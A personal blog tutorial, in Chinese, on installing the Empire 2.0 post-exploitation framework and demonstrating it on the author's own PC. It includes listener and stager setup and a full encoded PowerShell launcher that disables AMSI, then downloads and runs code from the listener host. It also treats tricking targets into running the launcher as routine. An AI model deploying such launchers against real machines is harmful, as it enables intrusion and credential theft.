#> RESTKHZ _

休止千鹤 | 我依旧是一名平凡的学生

Empire2.0,powershell后渗透利器的安装和试用

  休止千鹤  |    05/01/2021

本文来自老博客,2017年5月. 现情况可能有变化.当时系统内置python版本默认是python2.7,整理时候对原文做出了一定语言表述上的修改.

当时正好在MS17010后不久,Empire配合MS17010的exp让我在当时打透了不少内网(scriptkid).然而这篇文章仅仅做了介绍试用而已.

注意: 物是人非,刚刚看了评论,去Empire项目看了看发现已经停止更新.

杂七杂八的前言

也就是前几天的事情吧,弄完了一堆又一堆的东西(比如rpi装msf配置数据库啊,nfc弄饭卡什么的)。偶然发现了一个神器:Empire

这家伙完全利用powershell做很多事情,避开检测,可以监听键盘,Mimikatz也在其中。是一个很牛逼的框架。

(本文为安装试用,以介绍为主,老司机可以关掉节省宝贵的时间学习别的东西)

那么我们今天就装一下并且看看是如何进行攻击的。

引用一段官网介绍:

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Empire官网

icon

↑官网链接过来的图,帅帅的是不是?

这肯定又是在树莓派上装了。毕竟只有这个算是一个好的节能服务器了。对,还是osmc。现在已经成为一个渗透工具了。(题外话:最近淘了一个orange pi, 打算做一个移动的渗透工具。做好了说不定也写一篇)

安装&解决问题

(如果你已经装上了就跳过这一段)

官网直接转去github

git clone https://github.com/EmpireProject/Empire.git
cd Empire/
cd setup/
//./install.sh
 [!]This script must be run as root
//233
sudo ./install.sh

回到上一个目录 ./empire运行出了岔子,缺少OpenSSL,pip install 然后pip报错(莫名其妙)

Traceback (most recent call last):
  File "/usr/bin/pip", line 9, in <module>
    load_entry_point('pip==1.5.6', 'console_scripts', 'pip')()
  File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 356, in load_entry_point
    return get_distribution(dist).load_entry_point(group, name)
  File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 2476, in load_entry_point
    return ep.load()
  File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 2190, in load
    ['__name__'])
  File "/usr/lib/python2.7/dist-packages/pip/__init__.py", line 74, in <module>
    from pip.vcs import git, mercurial, subversion, bazaar  # noqa
  File "/usr/lib/python2.7/dist-packages/pip/vcs/mercurial.py", line 9, in <module>
    from pip.download import path_to_url
  File "/usr/lib/python2.7/dist-packages/pip/download.py", line 25, in <module>
    from requests.compat import IncompleteRead
ImportError: cannot import name IncompleteRead

(这里在2021年重新整理一下,当年废话太多了)
重新装了pip解决.
顺便安装依赖

sudo apt-get remove python-pip
sudo apt-get autoremove
sudo easy_install pip
sudo pip install pyopenssl netifaces zlib-wrapper

然后这才打开了Empire。确切的说是Empire2.0

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.0 | [Web] https://theempire.io
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       267 modules currently loaded

       0 listeners currently active

       0 agents currently active


(Empire) >

简单的使用演示

由于是2.0,操作和之前版本还是有去别的。摸索了半天。

这里的listeners就是MSF的监听。一样的。Agents相当于MSF的会话sessions。理清这个基本概念就好做事了。

我们的目标是让Rpi打开监听,协议http。然后生成一个dll载荷,生成一个powershell命令。诱骗目标执行(也可以用Badusb总之就是要执行一个命令)。

建立listener

(Empire) > listeners
[!] No listeners currently active 
(Empire: listeners) > help

Listener Commands
=================
agents            Jump to the Agents menu.
back              Go back to the main menu.
exit              Exit Empire.
help              Displays the help menu.
info              Display information for the given active listener.
kill              Kill one or all active listeners.
launcher          Generate an initial launcher for a listener.
list              List all active listeners (or agents).
main              Go back to the main menu.
uselistener       Use an Empire listener module.
usestager         Use an Empire stager.

(Empire: listeners) > uselistener 
dbx           http          http_com      http_foreign  http_hop      meterpreter     
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  Launcher          True        powershell -noP -w 1 -enc        Launcher string.
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  StagingKey        True        NLgp2rGjSu}k%RlUc*{zF:aKDCn[qev~ Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  Host              True        http://192.168.0.101:89          Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  Port              True        89                               Port for the listener.


(Empire: listeners/http) > set Name HttpListener
(Empire: listeners/http) > execute
[*] Starting listener 'HttpListener'
[+] Listener successfully started!
(Empire: listeners/http) >;

生成载荷

一个main命令回来

(整理注:整理的命令含义)

userstager windows/ 下面是windows可用的载荷
我这里用了dll
用info命令查看载荷具体信息

set Listener HttpListener 用于设置回连的监听
set Arch x86 架构,我电脑比较破,32位选x86
execute 执行

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.0 | [Web] https://theempire.io
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       267 modules currently loaded

       1 listeners currently active

       0 agents currently active


(Empire) > usestager windows/
bunny         dll           ducky         hta           launcher_bat  launcher_sct  launcher_vbs  macro         teensy        
(Empire) > usestager windows/dll
(Empire: stager/windows/dll) > info

Name: DLL Launcher

Description:
  Generate a PowerPick Reflective DLL to inject with
  stager code.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True        http              Listener to use.
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  Language         True        powershell        Language of the stager to generate.
  OutFile          True        /tmp/launcher.dll File to output dll to.
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Arch             True        x86               Architecture of the .dll to generate
                                                 (x64 or x86).
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/dll) > set Listener HttpListener
(Empire: stager/windows/dll) > set Arch x86
(Empire: stager/windows/dll) > execute

[*] Stager output written out to: /tmp/launcher.dll

(Empire: stager/windows/dll) > listeners

[*] Active listeners:

  Name              Module          Host                                 Delay/Jitter   KillDate
  ----              ------          ----                                 ------------   --------
  HttpListener      http            http://192.168.0.101:89              5/0.0                      

(Empire: listeners) > launcher powershell HttpListener
powershell -noP -w 1 -enc  WwBSAEUAZgBdAC4AQQBTAFMAZQBtAGIAbABZAC4ARwBlAFQAVABZAHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAVABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAQQBsAHUAZQAoACQAbgB1AEwAbAAsACQAVABSAFUAZQApAH0AOwBbAFMAWQBzAFQAZQBtAC4ATgBFAFQALgBTAEUAUgB2AEkAYwBFAFAAbwBpAG4AdABNAEEATgBhAEcAZQByAF0AOgA6AEUAWABwAGUAQwB0ADEAMAAwAEMAbwBuAHQAaQBuAFUARQA9ADAAOwAkAHcAQwA9AE4ARQBXAC0ATwBiAGoARQBjAFQAIABTAFkAUwB0AEUATQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkARQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AGMALgBIAEUAQQBkAEUAUgBzAC4AQQBEAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIATwBYAFkAPQBbAFMAWQBzAFQAZQBNAC4ATgBFAFQALgBXAEUAYgBSAEUAUQB1AEUAcwBUAF0AOgA6AEQARQBmAGEAdQBsAFQAVwBFAEIAUAByAE8AWAB5ADsAJABXAEMALgBQAHIATwBYAHkALgBDAFIAZQBEAGUATgBUAEkAQQBsAHMAIAA9ACAAWwBTAHkAUwBUAEUAbQAuAE4ARQB0AC4AQwBSAEUARABFAG4AVABJAGEAbABDAEEAQwBoAGUAXQA6ADoARABlAEYAQQB1AGwAdABOAEUAdAB3AG8AcgBLAEMAcgBlAGQARQBuAFQASQBhAEwAUwA7ACQASwA9AFsAUwB5AFMAVABFAG0ALgBUAGUAWAB0AC4ARQBuAGMAbwBkAEkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAWQB0AGUAcwAoACcATgBMAGcAcAAyAHIARwBqAFMAdQB9AGsAJQBSAGwAVQBjACoAewB6AEYAOgBhAEsARABDAG4AWwBxAGUAdgB+ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBDAC4ASABFAGEARABlAHIAUwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AMQBPADAAZQBSAHUAYwBrAHAAdQBJAHgAYgBiAFYAVQA4AGwAegBOAHUAawA1AEUAVwA1ADgAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAwAC4AMQAwADEAOgA4ADkAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQARABhAFQAQQA9ACQAVwBDAC4ARABPAHcAbgBMAG8AYQBkAEQAQQBUAGEAKAAkAHMAZQBSACsAJABUACkAOwAkAEkAdgA9ACQAZABhAHQAQQBbADAALgAuADMAXQA7ACQARABhAFQAQQA9ACQARABBAHQAYQBbADQALgAuACQARABBAFQAYQAuAGwAZQBOAGcAVABIAF0AOwAtAEoATwBpAG4AWwBDAGgAQQByAFsAXQBdACgAJgAgACQAUgAgACQARABBAFQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
(Empire: listeners) > [+] Initial agent 1R8T9BNA from 192.168.0.100 now active

(Empire: listeners) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  1R8T9BNA        ps    192.168.1.133   DESKTOP-NO77T28 DESKTOP-NO77T28\restpowershell/4060     5/0.0    2017-05-21 20:14:12

(Empire: agents) >

然后我们把刚刚生成的这么一大坨丢进一个cmd运行。(我的火绒弹出一个拦截,说powershell要联网)就返回一个agent。而那个cmd一闪而过。

就相当于得到一个MSF那样的会话了

目标简单探索

还是存在一些问题,就简单的贴两个info给各位看看了。

执行命令等待时间很长不知道为什么。尤其是列出文件目录,几乎没有反应。提权没有成功。

(Empire: listeners) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  1R8T9BNA        ps    192.168.1.133   DESKTOP-NO77T28 DESKTOP-NO77T28\restpowershell/4060     5/0.0    2017-05-21 20:14:12

(Empire: agents) > help

Commands
========
back              Go back to the main menu.
clear             Clear one or more agent's taskings.
creds             Display/return credentials from the database.
exit              Exit Empire.
help              Displays the help menu.
interact          Interact with a particular agent.
kill              Task one or more agents to exit.
killdate          Set the killdate for one or more agents (killdate [agent/all] 01/01/2016).
list              Lists all active agents (or listeners).
listeners         Jump to the listeners menu.
lostlimit         Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] '
main              Go back to the main menu.
remove            Remove one or more agents from the database.
rename            Rename a particular agent.
searchmodule      Search Empire module names/descriptions.
sleep             Task one or more agents to 'sleep [agent/all] interval [jitter]'
usemodule         Use an Empire PowerShell module.
usestager         Use an Empire stager.
workinghours      Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00).

(Empire: agents) > interact 1R8T9BNA
(Empire: 1R8T9BNA) > help

Agent Commands
==============
agents            Jump to the Agents menu.
back              Go back a menu.
bypassuac         Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear             Clear out agent tasking.
creds             Display/return credentials from the database.
download          Task an agent to download a file.
exit              Task agent to exit.
help              Displays the help menu or syntax for particular commands.
info              Display information about this agent
injectshellcode   Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>
jobs              Return jobs or kill a running job.
kill              Task an agent to kill a particular process name or ID.
killdate          Get or set an agent's killdate (01/01/2016).
list              Lists all active agents (or listeners).
listeners         Jump to the listeners menu.
lostlimit         Task an agent to change the limit on lost agent detection
main              Go back to the main menu.
mimikatz          Runs Invoke-Mimikatz on the client.
psinject          Inject a launcher into a remote process. Ex. psinject <listener> <pid/process_name>
pth               Executes PTH for a CredID through Mimikatz.
rename            Rename the agent.
revtoself         Uses credentials/tokens to revert token privileges.
sc                Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]
scriptcmd         Execute a function in the currently imported PowerShell script.
scriptimport      Imports a PowerShell script and keeps it in memory in the agent.
searchmodule      Search Empire module names/descriptions.
shell             Task an agent to use a shell command.
sleep             Task an agent to 'sleep interval [jitter]'
spawn             Spawns a new Empire agent for the given listener name. Ex. spawn <listener>
steal_token       Uses credentials/tokens to impersonate a token for a given process ID.
sysinfo           Task an agent to get system information.
updateprofile     Update an agent connection profile.
upload            Task an agent to upload a file.
usemodule         Use an Empire PowerShell module.
workinghours      Get or set an agent's working hours (9:00-17:00).

(Empire: 1R8T9BNA) > sysinfo
(Empire: 1R8T9BNA) > sysinfo: 0|http://192.168.0.101:89|DESKTOP-NO77T28|rest|DESKTOP-NO77T28|192.168.1.133|Microsoft Windows 10 教育版|False|powershell|4060|powershell|5

(Empire: 1R8T9BNA) > info

[*] Agent info:

    nonce               7085646166885544
    jitter              0.0
    servers             None
    internal_ip         192.168.1.133
    working_hours       
    session_key         bYy3w$)K`>-.Jj;&@vEDSaMP|meFZT(!
    children            None
    checkin_time        2017-05-21 20:14:06
    hostname            DESKTOP-NO77T28
    id                  1
    delay               5
    username            DESKTOP-NO77T28\rest
    kill_date           
    parent              None
    process_name        powershell
    listener            HttpListener
    process_id          4060
    profile             /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT
                                6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    os_details          Microsoft Windows 10 ???
    lost_limit          60
    taskings            
    name                1R8T9BNA
    language            powershell
    external_ip         192.168.0.100
    session_id          1R8T9BNA
    lastseen_time       2017-05-21 20:18:37
    language_version    5
    high_integrity      0

(Empire: 1R8T9BNA) >

 views:86

 Comments


lee:

文章是最新写的,请问为什么不装最新版本呢,最新的empire 2.5

 Reply


restkhz:(admin)

lee said : 文章是最新写的,请问为什么不装最新版本呢,最新的empire 2.5
这篇文章是我2017年的时候写的. 因为去年博客搬了一下换了系统,所以很多文章链接失效了.这篇文章有人外链,那么还是补一下吧. 如果各位真的需要,欢迎留言什么的...我考虑补一篇最新版.另外,,, 各位都不留邮箱的吗!!!

 Reply